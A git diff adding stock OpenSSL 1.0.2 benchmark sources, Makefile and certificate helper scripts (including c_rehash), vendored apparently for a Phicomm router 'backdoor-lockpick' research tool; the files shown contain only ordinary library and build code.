diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/x86/md4s.cpp b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/x86/md4s.cpp
new file mode 100644
index 0000000..c0ec97f
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/x86/md4s.cpp
@@ -0,0 +1,78 @@
+//
+// gettsc.inl
+//
+// gives access to the Pentium's (secret) cycle counter
+//
+// This software was written by Leonard Janke (janke@unixg.ubc.ca)
+// in 1996-7 and is entered, by him, into the public domain.
+
+#if defined(__WATCOMC__)
+void GetTSC(unsigned long&);
+#pragma aux GetTSC = 0x0f 0x31 "mov [edi], eax" parm [edi] modify [edx eax];
+#elif defined(__GNUC__)
+inline
+void GetTSC(unsigned long& tsc)
+{
+  asm volatile(".byte 15, 49\n\t"
+	       : "=eax" (tsc)
+	       :
+	       : "%edx", "%eax");
+}
+#elif defined(_MSC_VER)
+inline
+void GetTSC(unsigned long& tsc)
+{
+  unsigned long a;
+  __asm _emit 0fh
+  __asm _emit 31h
+  __asm mov a, eax;
+  tsc=a;
+}
+#endif      
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <openssl/md4.h>
+
+extern "C" {
+void md4_block_x86(MD4_CTX *ctx, unsigned char *buffer,int num);
+}
+
+void main(int argc,char *argv[])
+	{
+	unsigned char buffer[64*256];
+	MD4_CTX ctx;
+	unsigned long s1,s2,e1,e2;
+	unsigned char k[16];
+	unsigned long data[2];
+	unsigned char iv[8];
+	int i,num=0,numm;
+	int j=0;
+
+	if (argc >= 2)
+		num=atoi(argv[1]);
+
+	if (num == 0) num=16;
+	if (num > 250) num=16;
+	numm=num+2;
+	num*=64;
+	numm*=64;
+
+	for (j=0; j<6; j++)
+		{
+		for (i=0; i<10; i++) /**/
+			{
+			md4_block_x86(&ctx,buffer,numm);
+			GetTSC(s1);
+			md4_block_x86(&ctx,buffer,numm);
+			GetTSC(e1);
+			GetTSC(s2);
+			md4_block_x86(&ctx,buffer,num);
+			GetTSC(e2);
+			md4_block_x86(&ctx,buffer,num);
+			}
+		printf("md4 (%d bytes) %d %d (%.2f)\n",num,
+			e1-s1,e2-s2,(double)((e1-s1)-(e2-s2))/2);
+		}
+	}
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/x86/md5s.cpp b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/x86/md5s.cpp
new file mode 100644
index 0000000..dd343fd
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/x86/md5s.cpp
@@ -0,0 +1,78 @@
+//
+// gettsc.inl
+//
+// gives access to the Pentium's (secret) cycle counter
+//
+// This software was written by Leonard Janke (janke@unixg.ubc.ca)
+// in 1996-7 and is entered, by him, into the public domain.
+
+#if defined(__WATCOMC__)
+void GetTSC(unsigned long&);
+#pragma aux GetTSC = 0x0f 0x31 "mov [edi], eax" parm [edi] modify [edx eax];
+#elif defined(__GNUC__)
+inline
+void GetTSC(unsigned long& tsc)
+{
+  asm volatile(".byte 15, 49\n\t"
+	       : "=eax" (tsc)
+	       :
+	       : "%edx", "%eax");
+}
+#elif defined(_MSC_VER)
+inline
+void GetTSC(unsigned long& tsc)
+{
+  unsigned long a;
+  __asm _emit 0fh
+  __asm _emit 31h
+  __asm mov a, eax;
+  tsc=a;
+}
+#endif      
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <openssl/md5.h>
+
+extern "C" {
+void md5_block_x86(MD5_CTX *ctx, unsigned char *buffer,int num);
+}
+
+void main(int argc,char *argv[])
+	{
+	unsigned char buffer[64*256];
+	MD5_CTX ctx;
+	unsigned long s1,s2,e1,e2;
+	unsigned char k[16];
+	unsigned long data[2];
+	unsigned char iv[8];
+	int i,num=0,numm;
+	int j=0;
+
+	if (argc >= 2)
+		num=atoi(argv[1]);
+
+	if (num == 0) num=16;
+	if (num > 250) num=16;
+	numm=num+2;
+	num*=64;
+	numm*=64;
+
+	for (j=0; j<6; j++)
+		{
+		for (i=0; i<10; i++) /**/
+			{
+			md5_block_x86(&ctx,buffer,numm);
+			GetTSC(s1);
+			md5_block_x86(&ctx,buffer,numm);
+			GetTSC(e1);
+			GetTSC(s2);
+			md5_block_x86(&ctx,buffer,num);
+			GetTSC(e2);
+			md5_block_x86(&ctx,buffer,num);
+			}
+		printf("md5 (%d bytes) %d %d (%.2f)\n",num,
+			e1-s1,e2-s2,(double)((e1-s1)-(e2-s2))/2);
+		}
+	}
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/x86/rc4s.cpp b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/x86/rc4s.cpp
new file mode 100644
index 0000000..3814fde
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/x86/rc4s.cpp
@@ -0,0 +1,73 @@
+//
+// gettsc.inl
+//
+// gives access to the Pentium's (secret) cycle counter
+//
+// This software was written by Leonard Janke (janke@unixg.ubc.ca)
+// in 1996-7 and is entered, by him, into the public domain.
+
+#if defined(__WATCOMC__)
+void GetTSC(unsigned long&);
+#pragma aux GetTSC = 0x0f 0x31 "mov [edi], eax" parm [edi] modify [edx eax];
+#elif defined(__GNUC__)
+inline
+void GetTSC(unsigned long& tsc)
+{
+  asm volatile(".byte 15, 49\n\t"
+	       : "=eax" (tsc)
+	       :
+	       : "%edx", "%eax");
+}
+#elif defined(_MSC_VER)
+inline
+void GetTSC(unsigned long& tsc)
+{
+  unsigned long a;
+  __asm _emit 0fh
+  __asm _emit 31h
+  __asm mov a, eax;
+  tsc=a;
+}
+#endif      
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <openssl/rc4.h>
+
+void main(int argc,char *argv[])
+	{
+	unsigned char buffer[1024];
+	RC4_KEY ctx;
+	unsigned long s1,s2,e1,e2;
+	unsigned char k[16];
+	unsigned long data[2];
+	unsigned char iv[8];
+	int i,num=64,numm;
+	int j=0;
+
+	if (argc >= 2)
+		num=atoi(argv[1]);
+
+	if (num == 0) num=256;
+	if (num > 1024-16) num=1024-16;
+	numm=num+8;
+
+	for (j=0; j<6; j++)
+		{
+		for (i=0; i<10; i++) /**/
+			{
+			RC4(&ctx,numm,buffer,buffer);
+			GetTSC(s1);
+			RC4(&ctx,numm,buffer,buffer);
+			GetTSC(e1);
+			GetTSC(s2);
+			RC4(&ctx,num,buffer,buffer);
+			GetTSC(e2);
+			RC4(&ctx,num,buffer,buffer);
+			}
+
+		printf("RC4 (%d bytes) %d %d (%d) - 8 bytes\n",num,
+			e1-s1,e2-s2,(e1-s1)-(e2-s2));
+		}
+	}
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/x86/sha1s.cpp b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/x86/sha1s.cpp
new file mode 100644
index 0000000..3103e18
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/x86/sha1s.cpp
@@ -0,0 +1,79 @@
+//
+// gettsc.inl
+//
+// gives access to the Pentium's (secret) cycle counter
+//
+// This software was written by Leonard Janke (janke@unixg.ubc.ca)
+// in 1996-7 and is entered, by him, into the public domain.
+
+#if defined(__WATCOMC__)
+void GetTSC(unsigned long&);
+#pragma aux GetTSC = 0x0f 0x31 "mov [edi], eax" parm [edi] modify [edx eax];
+#elif defined(__GNUC__)
+inline
+void GetTSC(unsigned long& tsc)
+{
+  asm volatile(".byte 15, 49\n\t"
+	       : "=eax" (tsc)
+	       :
+	       : "%edx", "%eax");
+}
+#elif defined(_MSC_VER)
+inline
+void GetTSC(unsigned long& tsc)
+{
+  unsigned long a;
+  __asm _emit 0fh
+  __asm _emit 31h
+  __asm mov a, eax;
+  tsc=a;
+}
+#endif      
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <openssl/sha.h>
+
+extern "C" {
+void sha1_block_x86(SHA_CTX *ctx, unsigned char *buffer,int num);
+}
+
+void main(int argc,char *argv[])
+	{
+	unsigned char buffer[64*256];
+	SHA_CTX ctx;
+	unsigned long s1,s2,e1,e2;
+	unsigned char k[16];
+	unsigned long data[2];
+	unsigned char iv[8];
+	int i,num=0,numm;
+	int j=0;
+
+	if (argc >= 2)
+		num=atoi(argv[1]);
+
+	if (num == 0) num=16;
+	if (num > 250) num=16;
+	numm=num+2;
+	num*=64;
+	numm*=64;
+
+	for (j=0; j<6; j++)
+		{
+		for (i=0; i<10; i++) /**/
+			{
+			sha1_block_x86(&ctx,buffer,numm);
+			GetTSC(s1);
+			sha1_block_x86(&ctx,buffer,numm);
+			GetTSC(e1);
+			GetTSC(s2);
+			sha1_block_x86(&ctx,buffer,num);
+			GetTSC(e2);
+			sha1_block_x86(&ctx,buffer,num);
+			}
+
+		printf("sha1 (%d bytes) %d %d (%.2f)\n",num,
+			e1-s1,e2-s2,(double)((e1-s1)-(e2-s2))/2);
+		}
+	}
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/tools/Makefile b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/tools/Makefile
new file mode 100644
index 0000000..bb6fb71
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/tools/Makefile
@@ -0,0 +1,59 @@
+#
+# OpenSSL/tools/Makefile
+#
+
+DIR=	tools
+TOP=	..
+CC=	cc
+INCLUDES= -I$(TOP) -I../../include
+CFLAG=-g
+MAKEFILE=	Makefile
+
+CFLAGS= $(INCLUDES) $(CFLAG)
+
+GENERAL=Makefile
+TEST=
+APPS= c_rehash
+MISC_APPS= c_hash c_info c_issuer c_name
+
+all:
+
+install:
+	@[ -n "$(INSTALLTOP)" ] # should be set by top Makefile...
+	@for i in $(APPS) ; \
+	do  \
+	(cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/bin/$$i.new; \
+	chmod 755 $(INSTALL_PREFIX)$(INSTALLTOP)/bin/$$i.new; \
+	mv -f $(INSTALL_PREFIX)$(INSTALLTOP)/bin/$$i.new $(INSTALL_PREFIX)$(INSTALLTOP)/bin/$$i ); \
+	done;
+	@for i in $(MISC_APPS) ; \
+	do  \
+	(cp $$i $(INSTALL_PREFIX)$(OPENSSLDIR)/misc/$$i.new; \
+	chmod 755 $(INSTALL_PREFIX)$(OPENSSLDIR)/misc/$$i.new; \
+	mv -f $(INSTALL_PREFIX)$(OPENSSLDIR)/misc/$$i.new $(INSTALL_PREFIX)$(OPENSSLDIR)/misc/$$i ); \
+	done;
+
+files:
+	$(PERL) $(TOP)/util/files.pl Makefile >> $(TOP)/MINFO
+
+links:
+
+lint:
+
+tags:
+
+errors:
+
+depend:
+
+dclean:
+	$(PERL) -pe 'if (/^# DO NOT DELETE THIS LINE/) {print; exit(0);}' $(MAKEFILE) >Makefile.new
+	mv -f Makefile.new $(MAKEFILE)
+	rm -f c_rehash
+
+clean:
+	rm -f *.o *.obj lib tags core .pure .nfs* *.old *.bak fluff
+
+errors:
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/tools/c89.sh b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/tools/c89.sh
new file mode 100755
index 0000000..b25c9fd
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/tools/c89.sh
@@ -0,0 +1,15 @@
+#!/bin/sh -k
+#
+# Re-order arguments so that -L comes first
+#
+opts=""
+lopts=""
+        
+for arg in $* ; do
+  case $arg in
+    -L*) lopts="$lopts $arg" ;;
+    *) opts="$opts $arg" ;;
+  esac
+done
+
+c89 $lopts $opts
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/tools/c_hash b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/tools/c_hash
new file mode 100644
index 0000000..5e0a908
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/tools/c_hash
@@ -0,0 +1,9 @@
+#!/bin/sh
+# print out the hash values 
+#
+
+for i in $*
+do
+	h=`openssl x509 -hash -noout -in $i`
+	echo "$h.0 => $i"
+done
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/tools/c_info b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/tools/c_info
new file mode 100644
index 0000000..0e1e633
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/tools/c_info
@@ -0,0 +1,12 @@
+#!/bin/sh
+#
+# print the subject
+#
+
+for i in $*
+do
+	n=`openssl x509 -subject -issuer -enddate -noout -in $i`
+	echo "$i"
+	echo "$n"
+	echo "--------"
+done
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/tools/c_issuer b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/tools/c_issuer
new file mode 100644
index 0000000..55821ab
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/tools/c_issuer
@@ -0,0 +1,10 @@
+#!/bin/sh
+#
+# print out the issuer
+#
+
+for i in $*
+do
+	n=`openssl x509 -issuer -noout -in $i`
+	echo "$i	$n"
+done
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/tools/c_name b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/tools/c_name
new file mode 100644
index 0000000..28800c0
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/tools/c_name
@@ -0,0 +1,10 @@
+#!/bin/sh
+#
+# print the subject
+#
+
+for i in $*
+do
+	n=`openssl x509 -subject -noout -in $i`
+	echo "$i	$n"
+done
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/tools/c_rehash b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/tools/c_rehash
new file mode 100644
index 0000000..bc368a5
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/tools/c_rehash
@@ -0,0 +1,210 @@
+#!/usr/bin/perl
+
+# Perl c_rehash script, scan all files in a directory
+# and add symbolic links to their hash values.
+
+my $dir = "/home/lucca/Tenable/Routers/Phicomm/Tools/backdoor-lockpick/opt";
+my $prefix = "/home/lucca/Tenable/Routers/Phicomm/Tools/backdoor-lockpick/opt";
+
+my $openssl = $ENV{OPENSSL} || "openssl";
+my $pwd;
+my $x509hash = "-subject_hash";
+my $crlhash = "-hash";
+my $verbose = 0;
+my $symlink_exists=eval {symlink("",""); 1};
+my $removelinks = 1;
+
+##  Parse flags.
+while ( $ARGV[0] =~ '-.*' ) {
+    my $flag = shift @ARGV;
+    last if ( $flag eq '--');
+    if ( $flag =~ /-old/) {
+	    $x509hash = "-subject_hash_old";
+	    $crlhash = "-hash_old";
+    } elsif ( $flag =~ /-h/) {
+	    help();
+    } elsif ( $flag eq '-n' ) {
+	    $removelinks = 0;
+    } elsif ( $flag eq '-v' ) {
+	    $verbose++;
+    }
+    else {
+	    print STDERR "Usage error; try -help.\n";
+	    exit 1;
+    }
+}
+
+sub help {
+	print "Usage: c_rehash [-old] [-h] [-v] [dirs...]\n";
+	print "   -old use old-style digest\n";
+	print "   -h print this help text\n";
+	print "   -v print files removed and linked\n";
+	exit 0;
+}
+
+eval "require Cwd";
+if (defined(&Cwd::getcwd)) {
+	$pwd=Cwd::getcwd();
+} else {
+	$pwd=`pwd`;
+	chomp($pwd);
+}
+
+# DOS/Win32 or Unix delimiter?  Prefix our installdir, then search.
+my $path_delim = ($pwd =~ /^[a-z]\:/i) ? ';' : ':';
+$ENV{PATH} = "$prefix/bin" . ($ENV{PATH} ? $path_delim . $ENV{PATH} : "");
+
+if(! -x $openssl) {
+	my $found = 0;
+	foreach (split /$path_delim/, $ENV{PATH}) {
+		if(-x "$_/$openssl") {
+			$found = 1;
+			$openssl = "$_/$openssl";
+			last;
+		}	
+	}
+	if($found == 0) {
+		print STDERR "c_rehash: rehashing skipped ('openssl' program not available)\n";
+		exit 0;
+	}
+}
+
+if(@ARGV) {
+	@dirlist = @ARGV;
+} elsif($ENV{SSL_CERT_DIR}) {
+	@dirlist = split /$path_delim/, $ENV{SSL_CERT_DIR};
+} else {
+	$dirlist[0] = "$dir/certs";
+}
+
+if (-d $dirlist[0]) {
+	chdir $dirlist[0];
+	$openssl="$pwd/$openssl" if (!-x $openssl);
+	chdir $pwd;
+}
+
+foreach (@dirlist) {
+	if(-d $_ and -w $_) {
+		hash_dir($_);
+	}
+}
+
+sub hash_dir {
+	my %hashlist;
+	print "Doing $_[0]\n";
+	chdir $_[0];
+	opendir(DIR, ".");
+	my @flist = readdir(DIR);
+	closedir DIR;
+	if ( $removelinks ) {
+		# Delete any existing symbolic links
+		foreach (grep {/^[\da-f]+\.r{0,1}\d+$/} @flist) {
+			if(-l $_) {
+				unlink $_;
+				print "unlink $_" if $verbose;
+			}
+		}
+	}
+	FILE: foreach $fname (grep {/\.(pem)|(crt)|(cer)|(crl)$/} @flist) {
+		# Check to see if certificates and/or CRLs present.
+		my ($cert, $crl) = check_file($fname);
+		if(!$cert && !$crl) {
+			print STDERR "WARNING: $fname does not contain a certificate or CRL: skipping\n";
+			next;
+		}
+		link_hash_cert($fname) if($cert);
+		link_hash_crl($fname) if($crl);
+	}
+}
+
+sub check_file {
+	my ($is_cert, $is_crl) = (0,0);
+	my $fname = $_[0];
+	open IN, $fname;
+	while(<IN>) {
+		if(/^-----BEGIN (.*)-----/) {
+			my $hdr = $1;
+			if($hdr =~ /^(X509 |TRUSTED |)CERTIFICATE$/) {
+				$is_cert = 1;
+				last if($is_crl);
+			} elsif($hdr eq "X509 CRL") {
+				$is_crl = 1;
+				last if($is_cert);
+			}
+		}
+	}
+	close IN;
+	return ($is_cert, $is_crl);
+}
+
+
+# Link a certificate to its subject name hash value, each hash is of
+# the form <hash>.<n> where n is an integer. If the hash value already exists
+# then we need to up the value of n, unless its a duplicate in which
+# case we skip the link. We check for duplicates by comparing the
+# certificate fingerprints
+
+sub link_hash_cert {
+		my $fname = $_[0];
+		$fname =~ s/'/'\\''/g;
+		my ($hash, $fprint) = `"$openssl" x509 $x509hash -fingerprint -noout -in "$fname"`;
+		chomp $hash;
+		chomp $fprint;
+		$fprint =~ s/^.*=//;
+		$fprint =~ tr/://d;
+		my $suffix = 0;
+		# Search for an unused hash filename
+		while(exists $hashlist{"$hash.$suffix"}) {
+			# Hash matches: if fingerprint matches its a duplicate cert
+			if($hashlist{"$hash.$suffix"} eq $fprint) {
+				print STDERR "WARNING: Skipping duplicate certificate $fname\n";
+				return;
+			}
+			$suffix++;
+		}
+		$hash .= ".$suffix";
+		if ($symlink_exists) {
+			symlink $fname, $hash;
+			print "link $fname -> $hash\n" if $verbose;
+		} else {
+			open IN,"<$fname" or die "can't open $fname for read";
+			open OUT,">$hash" or die "can't open $hash for write";
+			print OUT <IN>;	# does the job for small text files
+			close OUT;
+			close IN;
+			print "copy $fname -> $hash\n" if $verbose;
+		}
+		$hashlist{$hash} = $fprint;
+}
+
+# Same as above except for a CRL. CRL links are of the form <hash>.r<n>
+
+sub link_hash_crl {
+		my $fname = $_[0];
+		$fname =~ s/'/'\\''/g;
+		my ($hash, $fprint) = `"$openssl" crl $crlhash -fingerprint -noout -in '$fname'`;
+		chomp $hash;
+		chomp $fprint;
+		$fprint =~ s/^.*=//;
+		$fprint =~ tr/://d;
+		my $suffix = 0;
+		# Search for an unused hash filename
+		while(exists $hashlist{"$hash.r$suffix"}) {
+			# Hash matches: if fingerprint matches its a duplicate cert
+			if($hashlist{"$hash.r$suffix"} eq $fprint) {
+				print STDERR "WARNING: Skipping duplicate CRL $fname\n";
+				return;
+			}
+			$suffix++;
+		}
+		$hash .= ".r$suffix";
+		if ($symlink_exists) {
+			symlink $fname, $hash;
+			print "link $fname -> $hash\n" if $verbose;
+		} else {
+			system ("cp", $fname, $hash);
+			print "cp $fname -> $hash\n" if $verbose;
+		}
+		$hashlist{$hash} = $fprint;
+}
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/tools/c_rehash.bak b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/tools/c_rehash.bak
new file mode 100644
index 0000000..bc368a5
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/tools/c_rehash.bak
@@ -0,0 +1,210 @@
+#!/usr/bin/perl
+
+# Perl c_rehash script, scan all files in a directory
+# and add symbolic links to their hash values.
+
+my $dir = "/home/lucca/Tenable/Routers/Phicomm/Tools/backdoor-lockpick/opt";
+my $prefix = "/home/lucca/Tenable/Routers/Phicomm/Tools/backdoor-lockpick/opt";
+
+my $openssl = $ENV{OPENSSL} || "openssl";
+my $pwd;
+my $x509hash = "-subject_hash";
+my $crlhash = "-hash";
+my $verbose = 0;
+my $symlink_exists=eval {symlink("",""); 1};
+my $removelinks = 1;
+
+##  Parse flags.
+while ( $ARGV[0] =~ '-.*' ) {
+    my $flag = shift @ARGV;
+    last if ( $flag eq '--');
+    if ( $flag =~ /-old/) {
+	    $x509hash = "-subject_hash_old";
+	    $crlhash = "-hash_old";
+    } elsif ( $flag =~ /-h/) {
+	    help();
+    } elsif ( $flag eq '-n' ) {
+	    $removelinks = 0;
+    } elsif ( $flag eq '-v' ) {
+	    $verbose++;
+    }
+    else {
+	    print STDERR "Usage error; try -help.\n";
+	    exit 1;
+    }
+}
+
+sub help {
+	print "Usage: c_rehash [-old] [-h] [-v] [dirs...]\n";
+	print "   -old use old-style digest\n";
+	print "   -h print this help text\n";
+	print "   -v print files removed and linked\n";
+	exit 0;
+}
+
+eval "require Cwd";
+if (defined(&Cwd::getcwd)) {
+	$pwd=Cwd::getcwd();
+} else {
+	$pwd=`pwd`;
+	chomp($pwd);
+}
+
+# DOS/Win32 or Unix delimiter?  Prefix our installdir, then search.
+my $path_delim = ($pwd =~ /^[a-z]\:/i) ? ';' : ':';
+$ENV{PATH} = "$prefix/bin" . ($ENV{PATH} ? $path_delim . $ENV{PATH} : "");
+
+if(! -x $openssl) {
+	my $found = 0;
+	foreach (split /$path_delim/, $ENV{PATH}) {
+		if(-x "$_/$openssl") {
+			$found = 1;
+			$openssl = "$_/$openssl";
+			last;
+		}	
+	}
+	if($found == 0) {
+		print STDERR "c_rehash: rehashing skipped ('openssl' program not available)\n";
+		exit 0;
+	}
+}
+
+if(@ARGV) {
+	@dirlist = @ARGV;
+} elsif($ENV{SSL_CERT_DIR}) {
+	@dirlist = split /$path_delim/, $ENV{SSL_CERT_DIR};
+} else {
+	$dirlist[0] = "$dir/certs";
+}
+
+if (-d $dirlist[0]) {
+	chdir $dirlist[0];
+	$openssl="$pwd/$openssl" if (!-x $openssl);
+	chdir $pwd;
+}
+
+foreach (@dirlist) {
+	if(-d $_ and -w $_) {
+		hash_dir($_);
+	}
+}
+
+sub hash_dir {
+	my %hashlist;
+	print "Doing $_[0]\n";
+	chdir $_[0];
+	opendir(DIR, ".");
+	my @flist = readdir(DIR);
+	closedir DIR;
+	if ( $removelinks ) {
+		# Delete any existing symbolic links
+		foreach (grep {/^[\da-f]+\.r{0,1}\d+$/} @flist) {
+			if(-l $_) {
+				unlink $_;
+				print "unlink $_" if $verbose;
+			}
+		}
+	}
+	FILE: foreach $fname (grep {/\.(pem)|(crt)|(cer)|(crl)$/} @flist) {
+		# Check to see if certificates and/or CRLs present.
+		my ($cert, $crl) = check_file($fname);
+		if(!$cert && !$crl) {
+			print STDERR "WARNING: $fname does not contain a certificate or CRL: skipping\n";
+			next;
+		}
+		link_hash_cert($fname) if($cert);
+		link_hash_crl($fname) if($crl);
+	}
+}
+
+sub check_file {
+	my ($is_cert, $is_crl) = (0,0);
+	my $fname = $_[0];
+	open IN, $fname;
+	while(<IN>) {
+		if(/^-----BEGIN (.*)-----/) {
+			my $hdr = $1;
+			if($hdr =~ /^(X509 |TRUSTED |)CERTIFICATE$/) {
+				$is_cert = 1;
+				last if($is_crl);
+			} elsif($hdr eq "X509 CRL") {
+				$is_crl = 1;
+				last if($is_cert);
+			}
+		}
+	}
+	close IN;
+	return ($is_cert, $is_crl);
+}
+
+
+# Link a certificate to its subject name hash value, each hash is of
+# the form <hash>.<n> where n is an integer. If the hash value already exists
+# then we need to up the value of n, unless its a duplicate in which
+# case we skip the link. We check for duplicates by comparing the
+# certificate fingerprints
+
+sub link_hash_cert {
+		my $fname = $_[0];
+		$fname =~ s/'/'\\''/g;
+		my ($hash, $fprint) = `"$openssl" x509 $x509hash -fingerprint -noout -in "$fname"`;
+		chomp $hash;
+		chomp $fprint;
+		$fprint =~ s/^.*=//;
+		$fprint =~ tr/://d;
+		my $suffix = 0;
+		# Search for an unused hash filename
+		while(exists $hashlist{"$hash.$suffix"}) {
+			# Hash matches: if fingerprint matches its a duplicate cert
+			if($hashlist{"$hash.$suffix"} eq $fprint) {
+				print STDERR "WARNING: Skipping duplicate certificate $fname\n";
+				return;
+			}
+			$suffix++;
+		}
+		$hash .= ".$suffix";
+		if ($symlink_exists) {
+			symlink $fname, $hash;
+			print "link $fname -> $hash\n" if $verbose;
+		} else {
+			open IN,"<$fname" or die "can't open $fname for read";
+			open OUT,">$hash" or die "can't open $hash for write";
+			print OUT <IN>;	# does the job for small text files
+			close OUT;
+			close IN;
+			print "copy $fname -> $hash\n" if $verbose;
+		}
+		$hashlist{$hash} = $fprint;
+}
+
+# Same as above except for a CRL. CRL links are of the form <hash>.r<n>
+
+sub link_hash_crl {
+		my $fname = $_[0];
+		$fname =~ s/'/'\\''/g;
+		my ($hash, $fprint) = `"$openssl" crl $crlhash -fingerprint -noout -in '$fname'`;
+		chomp $hash;
+		chomp $fprint;
+		$fprint =~ s/^.*=//;
+		$fprint =~ tr/://d;
+		my $suffix = 0;
+		# Search for an unused hash filename
+		while(exists $hashlist{"$hash.r$suffix"}) {
+			# Hash matches: if fingerprint matches its a duplicate cert
+			if($hashlist{"$hash.r$suffix"} eq $fprint) {
+				print STDERR "WARNING: Skipping duplicate CRL $fname\n";
+				return;
+			}
+			$suffix++;
+		}
+		$hash .= ".r$suffix";
+		if ($symlink_exists) {
+			symlink $fname, $hash;
+			print "link $fname -> $hash\n" if $verbose;
+		} else {
+			system ("cp", $fname, $hash);
+			print "cp $fname -> $hash\n" if $verbose;
+		}
+		$hashlist{$hash} = $fprint;
+}
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/tools/c_rehash.in b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/tools/c_rehash.in
new file mode 100644
index 0000000..887e927
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/tools/c_rehash.in
@@ -0,0 +1,210 @@
+#!/usr/local/bin/perl
+
+# Perl c_rehash script, scan all files in a directory
+# and add symbolic links to their hash values.
+
+my $dir;
+my $prefix;
+
+my $openssl = $ENV{OPENSSL} || "openssl";
+my $pwd;
+my $x509hash = "-subject_hash";
+my $crlhash = "-hash";
+my $verbose = 0;
+my $symlink_exists=eval {symlink("",""); 1};
+my $removelinks = 1;
+
+##  Parse flags.
+while ( $ARGV[0] =~ '-.*' ) {
+    my $flag = shift @ARGV;
+    last if ( $flag eq '--');
+    if ( $flag =~ /-old/) {
+	    $x509hash = "-subject_hash_old";
+	    $crlhash = "-hash_old";
+    } elsif ( $flag =~ /-h/) {
+	    help();
+    } elsif ( $flag eq '-n' ) {
+	    $removelinks = 0;
+    } elsif ( $flag eq '-v' ) {
+	    $verbose++;
+    }
+    else {
+	    print STDERR "Usage error; try -help.\n";
+	    exit 1;
+    }
+}
+
+sub help {
+	print "Usage: c_rehash [-old] [-h] [-v] [dirs...]\n";
+	print "   -old use old-style digest\n";
+	print "   -h print this help text\n";
+	print "   -v print files removed and linked\n";
+	exit 0;
+}
+
+eval "require Cwd";
+if (defined(&Cwd::getcwd)) {
+	$pwd=Cwd::getcwd();
+} else {
+	$pwd=`pwd`;
+	chomp($pwd);
+}
+
+# DOS/Win32 or Unix delimiter?  Prefix our installdir, then search.
+my $path_delim = ($pwd =~ /^[a-z]\:/i) ? ';' : ':';
+$ENV{PATH} = "$prefix/bin" . ($ENV{PATH} ? $path_delim . $ENV{PATH} : "");
+
+if(! -x $openssl) {
+	my $found = 0;
+	foreach (split /$path_delim/, $ENV{PATH}) {
+		if(-x "$_/$openssl") {
+			$found = 1;
+			$openssl = "$_/$openssl";
+			last;
+		}	
+	}
+	if($found == 0) {
+		print STDERR "c_rehash: rehashing skipped ('openssl' program not available)\n";
+		exit 0;
+	}
+}
+
+if(@ARGV) {
+	@dirlist = @ARGV;
+} elsif($ENV{SSL_CERT_DIR}) {
+	@dirlist = split /$path_delim/, $ENV{SSL_CERT_DIR};
+} else {
+	$dirlist[0] = "$dir/certs";
+}
+
+if (-d $dirlist[0]) {
+	chdir $dirlist[0];
+	$openssl="$pwd/$openssl" if (!-x $openssl);
+	chdir $pwd;
+}
+
+foreach (@dirlist) {
+	if(-d $_ and -w $_) {
+		hash_dir($_);
+	}
+}
+
+sub hash_dir {
+	my %hashlist;
+	print "Doing $_[0]\n";
+	chdir $_[0];
+	opendir(DIR, ".");
+	my @flist = readdir(DIR);
+	closedir DIR;
+	if ( $removelinks ) {
+		# Delete any existing symbolic links
+		foreach (grep {/^[\da-f]+\.r{0,1}\d+$/} @flist) {
+			if(-l $_) {
+				unlink $_;
+				print "unlink $_" if $verbose;
+			}
+		}
+	}
+	FILE: foreach $fname (grep {/\.(pem)|(crt)|(cer)|(crl)$/} @flist) {
